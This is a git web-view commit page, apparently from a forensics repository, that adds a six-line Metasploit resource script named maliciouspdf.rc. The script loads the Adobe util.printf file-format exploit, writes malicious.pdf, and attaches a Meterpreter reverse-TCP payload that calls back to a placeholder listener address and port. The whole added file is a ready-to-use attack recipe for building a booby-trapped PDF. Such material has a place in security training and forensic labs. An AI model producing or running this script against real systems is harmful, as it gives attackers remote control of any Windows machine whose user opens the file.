summaryrefslogtreecommitdiff
path: root/malware/maliciouspdf.rc
diff options
context:
space:
mode:
authorjerome <jerome@xlinfo.fr>2023-11-13 01:34:03 +0100
committerjerome <jerome@xlinfo.fr>2023-11-13 01:34:03 +0100
commit696111049388b5a8f51b02e331b24c6650d4799e (patch)
tree38338bd33b598dcb2464bb44d151a37528dd7037 /malware/maliciouspdf.rc
downloadforensic-696111049388b5a8f51b02e331b24c6650d4799e.tar.gz
forensic-696111049388b5a8f51b02e331b24c6650d4799e.zip
commit initial
Diffstat (limited to 'malware/maliciouspdf.rc')
-rw-r--r--malware/maliciouspdf.rc6
1 files changed, 6 insertions, 0 deletions
diff --git a/malware/maliciouspdf.rc b/malware/maliciouspdf.rc
new file mode 100644
index 0000000..71c6c09
--- /dev/null
+++ b/malware/maliciouspdf.rc
@@ -0,0 +1,6 @@
+use exploit/windows/fileformat/adobe_utilprintf
+set FILENAME malicious.pdf
+set PAYLOAD windows/meterpreter/reverse_tcp
+set LHOST listening_ip
+set LPORT tcp_port
+exploit